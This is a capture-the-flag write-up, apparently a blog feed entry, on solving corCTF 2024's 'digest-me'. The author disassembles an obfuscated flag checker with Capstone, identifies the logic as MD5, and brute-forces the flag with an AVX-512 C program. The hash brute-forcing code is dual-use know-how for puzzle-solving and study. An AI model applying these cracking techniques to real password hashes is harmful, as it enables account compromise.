    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="n">_mm512_add_epi32</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0x2ad7d2bb</span><span class="p">)));</span>
    <span class="n">AVX512_STEP</span><span class="p">(</span><span class="n">AVX512_I</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="mh">0xeb86d391</span><span class="p">));</span>

    <span class="n">__mmask16</span> <span class="n">eq_c</span> <span class="o">=</span> <span class="n">_mm512_cmpeq_epi32_mask</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="n">T0</span><span class="p">));</span>
    <span class="n">__mmask16</span> <span class="n">eq_d</span> <span class="o">=</span> <span class="n">_mm512_cmpeq_epi32_mask</span><span class="p">(</span><span class="n">d</span><span class="p">,</span> <span class="n">_mm512_set1_epi32</span><span class="p">(</span><span class="n">T1</span><span class="p">));</span>
    <span class="n">__mmask16</span> <span class="n">eq</span> <span class="o">=</span> <span class="n">eq_c</span> <span class="o">&amp;</span> <span class="n">eq_d</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">eq</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">64</span><span class="p">)))</span> <span class="kt">uint32_t</span> <span class="n">_x0</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x1</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x2</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x0</span><span class="p">,</span> <span class="n">x0</span><span class="p">);</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x1</span><span class="p">,</span> <span class="n">x1</span><span class="p">);</span>
        <span class="n">_mm512_store_si512</span><span class="p">(</span><span class="n">_x2</span><span class="p">,</span> <span class="n">x2</span><span class="p">);</span>

        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
            <span class="k">if</span> <span class="p">((</span><span class="n">eq</span> <span class="o">&gt;&gt;</span> <span class="n">i</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span>
                <span class="n">printf</span><span class="p">(</span><span class="s">"found: %.4s%.4s%.4s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x0</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="p">(</span><span class="kt">uint8_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">_x2</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define A 62
#define NTHREADS 8
</span>
<span class="k">const</span> <span class="kt">char</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="o">=</span> <span class="s">"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">char</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="mi">50</span><span class="p">]</span> <span class="o">=</span> <span class="s">"012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv"</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">search</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">64</span><span class="p">)))</span> <span class="kt">uint32_t</span> <span class="n">_x0</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x1</span><span class="p">[</span><span class="mi">16</span><span class="p">],</span> <span class="n">_x2</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>

    <span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

    <span class="kt">int</span> <span class="n">start</span> <span class="o">=</span> <span class="n">n</span> <span class="o">*</span> <span class="p">(</span><span class="mi">50</span> <span class="o">/</span> <span class="n">NTHREADS</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">end</span> <span class="o">=</span> <span class="n">n</span> <span class="o">!=</span> <span class="n">NTHREADS</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">?</span> <span class="p">(</span><span class="n">n</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="mi">50</span> <span class="o">/</span> <span class="n">NTHREADS</span><span class="p">)</span> <span class="o">:</span> <span class="mi">50</span><span class="p">;</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"starting search [%d, %d)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">);</span>

    <span class="c1">// 11 unknown bytes (the text inside corctf{...}) plus the 0x80 byte that begins MD5 padding</span>
    <span class="kt">uint8_t</span> <span class="n">flag</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">flag</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x80</span><span class="p">;</span>

    <span class="c1">// ASCII codes of ALPHABET, 16 per vector; each lane is OR-ed into the low byte of x2, i.e. flag[8]</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y0</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">48</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">67</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">70</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y1</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">71</span><span class="p">,</span> <span class="mi">72</span><span class="p">,</span> <span class="mi">73</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">76</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">79</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">82</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">84</span><span class="p">,</span> <span class="mi">85</span><span class="p">,</span> <span class="mi">86</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y2</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">87</span><span class="p">,</span> <span class="mi">88</span><span class="p">,</span> <span class="mi">89</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">97</span><span class="p">,</span> <span class="mi">98</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mi">100</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="mi">102</span><span class="p">,</span> <span class="mi">103</span><span class="p">,</span> <span class="mi">104</span><span class="p">,</span> <span class="mi">105</span><span class="p">,</span> <span class="mi">106</span><span class="p">,</span> <span class="mi">107</span><span class="p">,</span> <span class="mi">108</span><span class="p">);</span>
    <span class="k">const</span> <span class="n">__m512i</span> <span class="n">Y3</span> <span class="o">=</span> <span class="n">_mm512_setr_epi32</span><span class="p">(</span><span class="mi">109</span><span class="p">,</span> <span class="mi">110</span><span class="p">,</span> <span class="mi">111</span><span class="p">,</span> <span class="mi">112</span><span class="p">,</span> <span class="mi">113</span><span class="p">,</span> <span class="mi">114</span><span class="p">,</span> <span class="mi">115</span><span class="p">,</span> <span class="mi">116</span><span class="p">,</span> <span class="mi">117</span><span class="p">,</span> <span class="mi">118</span><span class="p">,</span> <span class="mi">119</span><span class="p">,</span> <span class="mi">120</span><span class="p">,</span> <span class="mi">121</span><span class="p">,</span> <span class="mi">122</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">48</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c0</span> <span class="o">=</span> <span class="n">start</span><span class="p">;</span> <span class="n">c0</span> <span class="o">&lt;</span> <span class="n">end</span><span class="p">;</span> <span class="n">c0</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">];</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
        <span class="n">flag</span><span class="p">[</span><span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET_S4</span><span class="p">[</span><span class="n">c0</span><span class="p">]</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c1</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c1</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">flag</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c1</span><span class="p">];</span>
            <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c2</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c2</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">flag</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c2</span><span class="p">];</span>
                <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c3</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c3</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c3</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">flag</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c3</span><span class="p">];</span>
                    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c4</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c4</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c4</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                        <span class="n">flag</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c4</span><span class="p">];</span>
                        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">c5</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">c5</span> <span class="o">&lt;</span> <span class="n">A</span><span class="p">;</span> <span class="n">c5</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                            <span class="n">flag</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="n">ALPHABET</span><span class="p">[</span><span class="n">c5</span><span class="p">];</span>

                            <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">flag_u32</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="n">flag</span><span class="p">;</span>
                            <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
                                <span class="n">_x0</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
                                <span class="n">_x1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
                                <span class="n">_x2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_u32</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
                            <span class="p">}</span>

                            <span class="n">__m512i</span> <span class="n">x0</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x0</span><span class="p">);</span>
                            <span class="n">__m512i</span> <span class="n">x1</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x1</span><span class="p">);</span>
                            <span class="n">__m512i</span> <span class="n">x2</span> <span class="o">=</span> <span class="n">_mm512_load_si512</span><span class="p">(</span><span class="n">_x2</span><span class="p">);</span>

                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y0</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y1</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y2</span><span class="p">));</span>
                            <span class="n">md5_avx512</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">_mm512_or_si512</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="n">Y3</span><span class="p">));</span>
                        <span class="p">}</span>
                    <span class="p">}</span>
                <span class="p">}</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"checkpoint: %d (thread %d)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">c0</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">pthread_t</span> <span class="n">threads</span><span class="p">[</span><span class="n">NTHREADS</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NTHREADS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">pthread_create</span><span class="p">(</span><span class="o">&amp;</span><span class="n">threads</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">search</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NTHREADS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">pthread_join</span><span class="p">(</span><span class="n">threads</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="nb">NULL</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
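
<p>To make the lane layout in the code above a little more concrete, here is a small Python sketch (not part of the original solver) of how the four <code class="language-plaintext highlighter-rouge">Y</code> vectors enumerate byte 8 of the candidate, and how many hashes a full run of the search performs. The helper <code class="language-plaintext highlighter-rouge">lane_values</code> and the sample <code class="language-plaintext highlighter-rouge">x2_base</code> value are hypothetical names picked for illustration only.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import string

# Same ordering as ALPHABET in the C code: digits, uppercase, lowercase
# (62 symbols), padded with two extra "0" characters to fill 4 x 16 lanes.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase + "00"
LANES = 16


def lane_values(x2_base, group):
    """Return the 16 per-lane x2 words for one of the four Y vectors."""
    chars = ALPHABET[group * LANES:(group + 1) * LANES]
    # Byte 8 of the message is the low byte of the little-endian word x2.
    # It is zero in x2_base, so OR simply drops the character into place.
    return [x2_base | ord(ch) for ch in chars]


# Hypothetical x2_base: bytes 9 and 10 are "b" and "P", byte 11 is the 0x80 padding.
x2_base = int.from_bytes(b"\x00bP\x80", "little")
words = [w for group in range(4) for w in lane_values(x2_base, group)]
candidates = [w.to_bytes(4, "little") for w in words]
print(candidates[0], candidates[-1])

# Hashes computed by a full search: 50 choices for c0, 62 for each of c1..c5,
# and 64 lanes (62 distinct characters plus 2 duplicates) per inner iteration.
total = 50 * 62**5 * 64
print(total)
</code></pre></div></div>

<p>Under these assumptions a complete sweep is roughly 2.9 trillion MD5 evaluations, which is why checking 16 candidates per call matters so much here.</p>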

<p>After 1 hour and 20 minutes, the bruteforcer found the flag: <code class="language-plaintext highlighter-rouge">corctf{cPv3v8VfWbP}</code>. Submitting it to
<code class="language-plaintext highlighter-rouge">digestme</code> reveals the full flag:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./digestme
Welcome!
Please enter the flag here:
corctf<span class="o">{</span>cPv3v8VfWbP<span class="o">}</span>
Nice!

Full flag: corctf<span class="o">{</span>youtu.be/dQw4w9WgXcQ<span class="o">}</span>
</code></pre></div></div>
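
<p>As a sanity check, the recovered string can be tested against the preconditions found earlier in this post. The following Python sketch assumes those preconditions exactly as listed (length 19, the <code class="language-plaintext highlighter-rouge">corctf{</code> prefix, and the four byte relations); the function name <code class="language-plaintext highlighter-rouge">satisfies_preconditions</code> is made up for this example.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def satisfies_preconditions(flag):
    """Check the structural constraints enforced before the long instruction chain."""
    f = flag.encode()
    # The length test comes first so the index lookups below are never out of range.
    return (
        len(f) == 19
        and f[:7] == b"corctf{"
        and f[8] == f[17]
        and f[9] == f[11]
        and f[7] == f[16] + 1
        and f[14] == f[16] + 4
    )


print(satisfies_preconditions("corctf{cPv3v8VfWbP}"))
</code></pre></div></div>

<p>These are the same relations the bruteforcer hard-codes when it derives <code class="language-plaintext highlighter-rouge">flag[0]</code>, <code class="language-plaintext highlighter-rouge">flag[4]</code>, <code class="language-plaintext highlighter-rouge">flag[7]</code> and <code class="language-plaintext highlighter-rouge">flag[10]</code> from other bytes, only expressed with indices into the full flag instead of the text inside the braces.</p>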

<h3 id="final-thoughts">Final thoughts</h3>

<p>Even though I came so close to solving it in the end, and the challenge cost us 6th place, I enjoyed every
part of it, from converting the disassembly into bitwise operations and then 32-bit
integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I
somehow messed up.</p>

<p>I do believe the challenge would have been better off with a smaller search space, because some
people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization
is fun, especially when SIMD is involved.</p>

<p><img src="/assets/images/corctf2024/discord.png" alt="discord.png" /></p>]]></content><author><name>lydxn</name></author><summary type="html"><![CDATA[Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a gander at something that looked approachable. The two easiest challenges at the time by solve count were corMine: The Beginning and its sequel corMine 2: Revelations, which was a game of some sort. However, I eventually gave up after 5+ minutes trying to get the game to just run! But I guess I don’t feel so bad seeing as my teammates couldn’t figure it out either :’) corMine refusing to run without a GPU smh The next easiest one on the list was called digest-me, which is the topic of this post and what I poured most of my time on for the next 24 hours. Luckily, this one was a simple binary that asked you to input a flag, and told you whether it was correct. These kinds of programs are common enough in CTFs that they adopt a not-so-special name called a flag checker. Challenge The description gives us a few clues, perhaps it has something to do with hashing and bits (?), but otherwise just contains the average lore. FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked. Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t remember how the bits work! Can you help him get his life’s work back? Here is a sample interaction from the digestme binary: $ ./digestme Welcome! Please enter the flag here: corctf{what} Try again: corctf{potatoes} Try again: It’s too big One problem immediately came up when opening the program in Ghidra – it refused to decompile main()! 
Examining the disassembly to see what could possibly have gone wrong, I was horrified to witness a chain of about 300,000 instructions consisting solely of mov, and, or and xor: Luckily, I worked around this by patching ret instructions near the top and bottom of main() to ensure Ghidra doesn’t try to decompile all of it. That allows us to finally see the start of the function. Brute force? Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of preconditions that were enforced by those ifs: len(flag) == 19 flag[:7] == "corctf{" flag[8] == flag[17] flag[9] == flag[11] flag[7] == flag[16] + 1 flag[14] == flag[16] + 4 The short flag certainly raised my eyebrows about the possibility of brute force. There were 11 unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of 95^7 = 69,833,729,609,375 possible flags (assuming the flag is printable). However, it’s worth noting that each run would require at least 300,000 instructions, and 2 days would not be nearly enough to find the flag in time on my poor 4-core Intel i5 laptop. The rest of the program is focused on executing those 300,000 instructions, which judging by the disassembly just seems to be a bunch of operations on an array, A. A is initialized at the start via A = (byte *)calloc(1,100000), which allocates a zero-filled 100,000-byte array. The flag is then loaded into A by converting each byte inside corctf{...} into 8 bits, and then loading the bits starting from the offset *(A+0x940) in big-endian order. For those who speak Python, that looks something like this: A[0x940:0x998] = [(c &gt;&gt; i) &amp; 1 for c in code[7:-1] for i in range(7, -1, -1)] After the extremely long chain of array operations, the first 128 bits of A are converted into 4 32-bit integers (call them a, b, c, d). The flag checker outputs Nice! if c == 0x19c603ba and d == 0x14353ce4 (A.K.A. the target condition). 
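To make the bit layout concrete, here is a minimal sketch of the loading step described above. The flag value is a made-up placeholder (it does not even satisfy the preconditions), and the names inner and bits are only for illustration; the one-liner above is the actual description of what the binary does.

```python
# Sketch of how the flag bits end up in A (placeholder flag, not the real one).
A = [0] * 100000                    # mirrors calloc(1, 100000)
flag = b"corctf{0123456789a}"       # hypothetical 19-byte input
inner = flag[7:-1]                  # the 11 bytes inside corctf{...}

# Expand every byte into 8 bits, most significant bit first.
bits = [int(b) for byte in inner for b in format(byte, "08b")]
A[0x940:0x940 + len(bits)] = bits   # 88 bits, ending at 0x998

print(len(bits))
print(A[0x940:0x948])               # the bits of the first inner byte
```

Eleven bytes give 88 bits, which is exactly the 0x940 to 0x998 range used in the slice above.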
Reversing the elephant in the room Now that it was clear how the program was checking the flag, I worked on parsing the long array operations into something more readable. Once we had the instructions in a higher-level language, it would be possible in theory to rely on z3 to recover the flag for us. Instead of bashing Ghidra to decompile everything for us, I used capstone to parse the machine code into a clean disassembly: from capstone import * with open('digestme', 'rb') as f: binary = f.read() code = binary[0x1290:0xed854] cs = Cs(CS_ARCH_X86, CS_MODE_64) instructions = cs.disasm(code, 0) for inst in instructions: print(inst.mnemonic, inst.op_str) After combing through the output, I was surprised to find only two distinct groups of instructions. It was either a simple mov in the form, mov byte ptr [rax + X], Y which maps to A[X] = Y, or mov cl, byte ptr [rax + X] &lt;op&gt; cl, byte ptr [rax + Y] mov byte ptr [rax + Z], cl which maps to A[Z] = A[X] &lt;op&gt; A[Y] where &lt;op&gt; ∈ [and, or, xor]. 
This made it relatively easy to decompile with a little bit of regex: from capstone import * import re with open('digestme', 'rb') as f: binary = f.read() OP_MAP = {'and': '&amp;', 'or': '|', 'xor': '^'} code = binary[0x1290:0xed854] cs = Cs(CS_ARCH_X86, CS_MODE_64) instructions = cs.disasm(code, 0) commands = [] while (inst := next(instructions, None)) is not None: assert inst.mnemonic == 'mov' if m := re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], ([01])', inst.op_str): out = int(m[2], 0) if m[2] else 0 val = int(m[3]) commands.append(f'A[{out:#x}] = {val}') else: m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str) in1 = int(m[2], 0) if m[2] else 0 inst = next(instructions) m = re.fullmatch(r'cl, byte ptr \[rax( \+ (\w+)|)\]', inst.op_str) in2 = int(m[2], 0) if m[2] else 0 op = OP_MAP[inst.mnemonic] inst = next(instructions) m = re.fullmatch(r'byte ptr \[rax( \+ (\w+)|)\], cl', inst.op_str) out = int(m[2], 0) if m[2] else 0 commands.append(f'A[{out:#x}] = A[{in1:#x}] {op} A[{in2:#x}]') print(len(commands)) with open('commands.txt', 'w') as f: for cmd in commands: f.write(cmd + '\n') I also printed out the number of commands, which came out at a respectable 60,180. Still far from ideal, of course. Given the description of the challenge, I figured this was some hashing algorithm that was obfuscated by bit manipulations. Looking through the commands.txt file, I noticed that there was a lot of repetition. In fact, it almost always performed one of &amp;, |, or ^ in 32-bit chunks like this: A[0x0] = A[0xfa0] | A[0x100] A[0x1] = A[0xfa1] | A[0x101] A[0x2] = A[0xfa2] | A[0x102] A[0x3] = A[0xfa3] | A[0x103] ... A[0x1f] = A[0xfbf] | A[0x11f] However, there were also certain chunks that had all the operators combined in a mixed order, which strangely always came in groups of 157 that repeated ^, ^, &amp;, &amp;, | cyclically. 
A[0xe7] = A[0xc7] ^ A[0x27] A[0xb40] = A[0xc7] &amp; A[0x27] A[0xb41] = A[0xc6] ^ A[0x26] A[0xe6] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] A[0xb41] = A[0xc6] &amp; A[0x26] A[0xb40] = A[0xb41] | A[0xb40] A[0xb41] = A[0xc5] ^ A[0x25] A[0xe5] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] A[0xb41] = A[0xc5] &amp; A[0x25] A[0xb40] = A[0xb41] | A[0xb40] A[0xb41] = A[0xc4] ^ A[0x24] A[0xe4] = A[0xb41] ^ A[0xb40] A[0xb40] = A[0xb41] &amp; A[0xb40] At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But then I realized that this obscure-looking block of code was actually implementing a 32-bit adder! This finally made sense with the rest of the logic, and once I was certain that these were all indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert the 60,180 commands into a new set of commands performed on 32-bit integers: import re def MOV(cmd): m = re.fullmatch(r'A\[(\w+)\] = ([01])', cmd) if m is None: return None return int(m[1], 0), int(m[2]) def BITW(cmd): m = re.fullmatch(r'A\[(\w+)\] = A\[(\w+)\] ([\^|&amp;]) A\[(\w+)\]', cmd) if m is None: return None return int(m[1], 0), m[3], int(m[2], 0), int(m[4], 0) with open('commands.txt', 'r') as f: commands = list(map(str.rstrip, f)) ncommands = [] idx = 0 while idx &lt; len(commands): cmd = commands[idx] if MOV(cmd): chunk = commands[idx:idx+32] outs, vals = zip(*[MOV(cmd) for cmd in chunk]) assert outs == tuple(range(outs[0], outs[-1] - 1, -1)) and outs[-1] &amp; 31 == 0 val = 0 for o, v in zip(outs, vals): i = o &amp; 31 val |= v &lt;&lt; 8 * (i // 8) + 7 - (i % 8) ncommands.append(f'A[{outs[-1]&gt;&gt;5}] = {val:#x}') idx += 32 elif BITW(cmd) and BITW(cmd)[1] == BITW(commands[idx + 1])[1]: chunk = commands[idx:idx+32] outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk]) if outs[0] &amp; 31 == 0: assert outs == tuple(range(outs[0], outs[-1] + 1)) and outs[0] &amp; 31 == 0 assert 